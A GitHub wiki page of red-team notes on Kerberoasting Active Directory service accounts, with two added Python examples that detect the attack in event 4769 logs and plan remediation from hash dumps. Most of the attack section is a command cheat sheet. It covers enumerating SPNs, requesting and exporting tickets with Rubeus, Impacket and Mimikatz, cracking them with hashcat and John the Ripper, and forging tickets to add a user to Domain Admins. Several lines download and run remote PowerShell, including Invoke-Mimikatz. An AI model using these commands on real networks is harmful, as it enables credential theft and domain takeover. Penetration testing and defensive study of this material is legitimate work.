Kerberoasting - CraigDonkin/Infrastructure GitHub Wiki

Kerberoasting Notes

  • Request Service Ticket (TGS) for any service that has a registered SPN in a user or computer account in AD
  • SPNs are service principal names
    • "a unique identifier of a service instance. SPNs are used by kerberos authentication to associate a service instance with a service logon account"
  • Crack the service account plaintext password offline

General Process

  1. Attacker gets a TGT from the domain controller after authenticating to the domain with some compromised creds
  2. The attacker uses the TGT to issue a service ticket request for an SPN in the form sname/host
  3. The DC extracts the information from the TGT and makes a service ticket
  4. The DC looks up which account has the requested SPN registered in its servicePrincipalName attribute
  5. The service ticket is encrypted with the hash of the account that has the requested SPN registered
  6. Ticket is sent back to the attacker
  7. The attacker extracts the encrypted service ticket
  8. As the ticket was encrypted with the hash of the account linked to the requested SPN, the attacker can crack this offline to recover the account's plaintext password
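Every step above leaves a trace on the domain controller: each TGS request is logged as Security event 4769 with the requesting account, the service account, and the ticket encryption type. The following is an added detection example (not code from this wiki or from any tool it links); the log lines are constructed, with field names taken from the 4769 event (TargetUserName, ServiceName, TicketEncryptionType, IpAddress) as a SIEM export might present them. It flags RC4 (0x17) service tickets for user service accounts, and bursts where one principal requests tickets for many distinct service accounts in a short window, ignoring computer accounts and krbtgt.

```python
"""Detect Kerberoasting from Security event 4769 (TGS request) records.

Added example, not from the wiki or the tools it references. The sample
records are constructed; a real feed would come from the DC Security log.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17            # etype 23: legacy key; the type kerberoasting asks for
AES_ETYPES = {0x11, 0x12}  # etype 17/18: what a modern domain should be issuing

# Constructed sample, one record per line:
# timestamp|EventID|TargetUserName|ServiceName|TicketEncryptionType|IpAddress
SAMPLE_4769 = """\
2024-03-01T09:00:01|4769|alice@CORP.LOCAL|WS01$|0x12|10.0.0.5
2024-03-01T09:00:02|4769|alice@CORP.LOCAL|krbtgt|0x12|10.0.0.5
2024-03-01T09:15:00|4769|bob@CORP.LOCAL|svc_sql|0x17|10.0.0.9
2024-03-01T09:15:01|4769|bob@CORP.LOCAL|svc_web|0x17|10.0.0.9
2024-03-01T09:15:01|4769|bob@CORP.LOCAL|svc_backup|0x17|10.0.0.9
2024-03-01T09:15:02|4769|bob@CORP.LOCAL|svc_vnc|0x17|10.0.0.9
2024-03-01T09:15:03|4769|bob@CORP.LOCAL|svc_print|0x17|10.0.0.9
2024-03-01T09:15:03|4769|bob@CORP.LOCAL|svc_ldap|0x17|10.0.0.9
2024-03-01T09:30:00|4769|WS02$@CORP.LOCAL|svc_sql|0x12|10.0.0.12
2024-03-01T10:00:00|4769|carol@CORP.LOCAL|svc_sql|0x17|10.0.0.20
"""


def parse_4769(text):
    """Turn the pipe-separated export into event dicts; keep only 4769."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, eid, target, service, etype, ip = line.split("|")
        if eid != "4769":
            continue
        events.append({
            "time": datetime.fromisoformat(ts),
            "user": target.split("@")[0],   # strip the realm suffix
            "service": service,
            "etype": int(etype, 16),
            "ip": ip,
        })
    return events


def is_roastable_service(service):
    """Computer accounts ($) and krbtgt are not the usual kerberoast target."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoasting(events, threshold=5, window=timedelta(minutes=5)):
    """Return findings: RC4 tickets for user service accounts, and TGS bursts.

    A burst is one requester obtaining tickets for >= threshold distinct
    service accounts inside `window` (sliding over the sorted events).
    """
    findings = []
    by_user = defaultdict(list)
    for ev in events:
        if ev["user"].endswith("$"):          # machine accounts request constantly
            continue
        if not is_roastable_service(ev["service"]):
            continue
        if ev["etype"] == RC4_HMAC:
            findings.append({"rule": "rc4_service_ticket", "user": ev["user"],
                             "service": ev["service"], "ip": ev["ip"]})
        by_user[ev["user"]].append(ev)

    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        start, best = 0, set()
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            services = {e["service"] for e in evs[start:end + 1]}
            if len(services) > len(best):
                best = services
        if len(best) >= threshold:
            findings.append({"rule": "tgs_burst", "user": user,
                             "services": sorted(best), "count": len(best)})
    return findings


if __name__ == "__main__":
    for finding in detect_kerberoasting(parse_4769(SAMPLE_4769)):
        print(finding)
```

In the sample, bob trips the burst rule (six service accounts in three seconds, all RC4) while carol's single RC4 request is reported only as an encryption-type finding; alice and the WS02$ machine account produce nothing. On a real DC the same fields can be pulled with `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769}`; tune the threshold against a baseline, and treat any RC4 ticket for a user service account as a prompt to set that account to AES-only or move it to a gMSA.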

Red Teaming

  • Get user creds (phishing, left on a file server, password breach etc.)
  • Kerberoast DCs
  • Attempt to crack service account passwords
    • Service account passwords rarely change
  • Run BloodHound/SharpHound
  • Where can these users log in? Is there a route to DA?
  • Domain Admin

Methods

A lot of notes taken from https://room362.com/post/2016/kerberoast-pt1/ series of posts.

Also https://pentestlab.blog/2018/06/12/kerberoast/

Find users with SPN before roasting

Can be stealthier, as you only roast the accounts you want to roast.

ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

Retrieving SPN Tickets

SetSPN

Get-SPN

More examples from the Get-SPN GitHub page:

Find servers running specific services:

Get-SPN  -type service -search "*www*"
Get-SPN  -type service -search "MSSQLSvc*"
Get-SPN  -type service -search "MSSQLSvc*" -List yes 
Get-SPN  -type service -search "*vnc*" -list yes | select server -Unique
Get-SPN  -type service -search "MSSQLSvc*" -List yes | Select Server 
Get-SPN  -type service -search "MSSQLSvc*" -DomainController 192.168.1.100 -Credential domain\user
Get-SPN  -type service -search "MSSQLSvc*" -List yes -DomainController 192.168.1.100 -Credential domain\user 
Get-SPN  -type service -search "MSSQLSvc*" -List yes -DomainController 192.168.1.100 -Credential domain\user | Select Server  

Find servers where a specific user is registered to run services:

Get-SPN  -type user -search "serveradmin"
Get-SPN  -type user -search "sqladmin"
Get-SPN  -type user -search "sqladmin" -List yes | format-table -autosize
Get-SPN  -type user -search "sqladmin" -List yes | Select Server | format-table -autosize
Get-SPN  -type user -search "sqladmin" -DomainController 192.168.1.100 -Credential domain\user
Get-SPN  -type user -search "sqladmin" -List yes -DomainController 192.168.1.100 -Credential domain\user 
Get-SPN  -type user -search "sqladmin" -List yes -DomainController 192.168.1.100 -Credential domain\user | Select Server


Powershell Empire

GetUserSPNs.vbs

cscript GetUserSPNs.vbs

GetUserSPNs.ps1

PowerShell:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/nidem/kerberoast/master/GetUserSPNs.ps1')

Impacket

./GetUserSPNs.py -dc-ip [ip] domain/user

  • -request flag will request all of the SPN tickets in John the Ripper format

Meterpreter/Mimikatz

load kiwi
kerberos_ticket_list

or

kiwi_cmd kerberos::list

RiskySPN

https://github.com/cyberark/RiskySPN

Find-PotentiallyCrackableAccounts -FullData -Verbose

This script looks for accounts it thinks may be weak based on user account and password expiration settings.

The following will return all user accounts that have an associated SPN:

Find-PotentiallyCrackableAccounts -Domain "domain"

This will export as CSV:

Export-PotentiallyCrackableAccounts

Kerberoasting without Mimikatz

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon

invoke-kerberoast | fl

Invoke-Kerberoast -Domain blah | fl

This will be in the john format by default; -OutputFormat hashcat will use the hashcat format.

The -AdminCount flag will only kerberoast accounts with AdminCount=1.

NetExec

nxc ldap <IP> -u <username> -p <password> --kerberoasting <output>

Rubeus

https://github.com/GhostPack/Rubeus

The Rubeus kerberos attack tool has a kerberoast option

rubeus.exe kerberoast

Kerberoast an OU and save as a text file:

rubeus.exe kerberoast /ou:<ou> /outfile:<file location>

Kerberoast a specific user:

rubeus.exe kerberoast /user:<username>

Kerberoasting a specific SPN:

rubeus.exe kerberoast /spn:<spn>

The /nowrap flag is useful for cracking, as the hash is output on one line.

Requesting SPN Kerberos Tickets

One specific ticket

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "something/domain"

RiskySPN

Get-TGSCipher -SPN "Domain/SPN"

Getting Just the User Tickets

PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/nidem/kerberoast/master/GetUserSPNs.ps1") | ForEach-Object {try{New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.ServicePrincipalName}catch{}}

Exporting Tickets

Once tickets have been requested, this is how you can get them out of the system.

MimiKatz

kerberos::list /export

This will generate a file per ticket. The below uses the Invoke-Mimikatz script to pull Mimikatz into memory, then stores the tickets as base64:

PS C:\> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
PS C:\> Invoke-Mimikatz -Command 'standard::base64 "kerberos::list /export" exit'

Powershell Empire

usemodule credentials/mimikatz/extract_tickets

This module just does:

standard::base64
kerberos::list /export

You can also use the following to extract ticket hashes as either john or hashcat format

usemodule credentials/invoke_kerberoast
set OutputFormat
run

Convert Binary Tickets to Crackable Format

Kirbi2John

https://github.com/nidem/kerberoast/blob/master/kirbi2john.py

https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/run/kirbi2john.py

./kirbi2john.py blah.kirbi

PyKerberoast

https://github.com/skelsec/PyKerberoast

Obsolete now; the new version is:

https://github.com/skelsec/kerberoast

python kerberoastv2.py -a ip -b "dc=blah,dc=blah" -d domain -u username

Cracking SPN Tickets

John the Ripper

Use the magnumripper (Jumbo) build of John the Ripper: https://github.com/magnumripper/JohnTheRipper

./kirbi2john.py *.kirbi > /tmp/johnkirb.txt

./john /tmp/johnkirb.txt --wordlist

Hashcat

Tickets from Impacket are already in a crackable format; otherwise:

cat kirbi2johnoutput.txt | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'

./oclHashcat -m 13100 hash
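The sed one-liner above rewrites the older kirbi2john output into the hashcat 13100 layout, and it is easy to get the field order wrong. The following is an added example (not code from this wiki, nor from the kerberoast or hashcat projects) that parses $krb5tgs$ lines in the hashcat 13100 (RC4, etype 23) and 19600/19700 (AES, etype 17/18) layouts, rejects malformed lines, and produces a per-account remediation summary so that a defender handed a roasted-hash dump knows which service accounts were exposed and which were still issuing RC4 tickets. The hash lines are constructed.

```python
"""Parse $krb5tgs$ hash lines and summarise the exposed service accounts.

Added example, not from the wiki or the tools it links. Layouts follow the
hashcat modes: 13100 is $krb5tgs$23$*user$realm$spn*$checksum$edata and
19600/19700 are $krb5tgs$17|18$user$realm$*spn*$checksum$edata.
"""
import re
from collections import defaultdict

HASH_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23|18|17)\$"
    r"\*?(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$\*?(?P<spn>[^*]+)\*\$"
    r"(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$",
    re.IGNORECASE,
)

# Checksum length in hex chars: 16-byte HMAC-MD5 for RC4, 12-byte HMAC-SHA1-96 for AES.
CHECKSUM_HEX_LEN = {23: 32, 18: 24, 17: 24}
ETYPE_NAME = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# Constructed sample: one RC4 line, one AES256 line, one line of noise.
SAMPLE_HASHES = """\
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$0123456789abcdef0123456789abcdef$deadbeef0badcafe1122334455667788
$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$0123456789abcdef01234567$aabbccdd11223344aabbccdd11223344
not a hash line
"""


def parse_tgs_hash(line):
    """Return the fields of one $krb5tgs$ line, or None if it is malformed."""
    m = HASH_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype"))
    if len(m.group("checksum")) != CHECKSUM_HEX_LEN[etype]:
        return None  # wrong checksum size for this etype: a botched conversion
    return {
        "etype": etype,
        "etype_name": ETYPE_NAME[etype],
        "user": m.group("user"),
        "realm": m.group("realm"),
        "spn": m.group("spn"),
        "edata_bytes": len(m.group("edata")) // 2,
    }


def remediation_summary(text):
    """Group parsed lines by account and say what the defender should do."""
    parsed = [p for p in (parse_tgs_hash(l) for l in text.splitlines()) if p]
    by_account = defaultdict(lambda: {"spns": set(), "etypes": set()})
    for p in parsed:
        key = f"{p['realm']}\\{p['user']}"
        by_account[key]["spns"].add(p["spn"])
        by_account[key]["etypes"].add(p["etype"])

    summary = {}
    for acct, info in by_account.items():
        rc4 = 23 in info["etypes"]
        summary[acct] = {
            "spns": sorted(info["spns"]),
            "rc4_exposed": rc4,
            "action": ("rotate password; set msDS-SupportedEncryptionTypes to AES only "
                       "or convert to a gMSA") if rc4 else
                      ("rotate password; require a long random value or convert to a gMSA"),
        }
    return summary


if __name__ == "__main__":
    for acct, info in remediation_summary(SAMPLE_HASHES).items():
        print(acct, info)
```

The etype is the field worth reading first: an RC4 (23) line means the account still had RC4 enabled, which is what makes the ticket cheap to crack, so the fix is AES-only plus a rotation (or a gMSA, whose password is long, random and rotated automatically) rather than only a new password.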

What I found on a red team was to use a big wordlist then use hashcat rules such as:

  • leetspeak.rule
  • d3ad0ne.rule

TGSrepcrack

Part of the kerberoast toolkit

https://github.com/nidem/kerberoast

./tgsrepcrack.py wordlist.txt blah.kirbi

Rewriting Service Tickets

  • Tickets are encrypted (and their PAC signed) with the service account's key, which for RC4 is the NTLM hash of the password
  • If the ticket hash has been cracked you can rewrite the ticket with kerberoast
  • Allows you to impersonate a domain user or a fake account

./kerberoast.py -p Password -r blah.kirbi -w something.kirbi -u 500

Or add user to domain admin group:

./kerberoast.py -p Password1 -r 1-blah.kirbi -w something.kirbi -g 512  

The following would inject it back into RAM with Mimikatz:

kerberos::ptt something.kirbi

Resources

https://room362.com/post/2016/kerberoast-pt3/

https://room362.com/post/2016/kerberoast-pt1/

https://room362.com/post/2016/kerberoast-pt2

https://adsecurity.org/?tag=kerberoast

https://pentestlab.blog/2018/06/12/kerberoast/
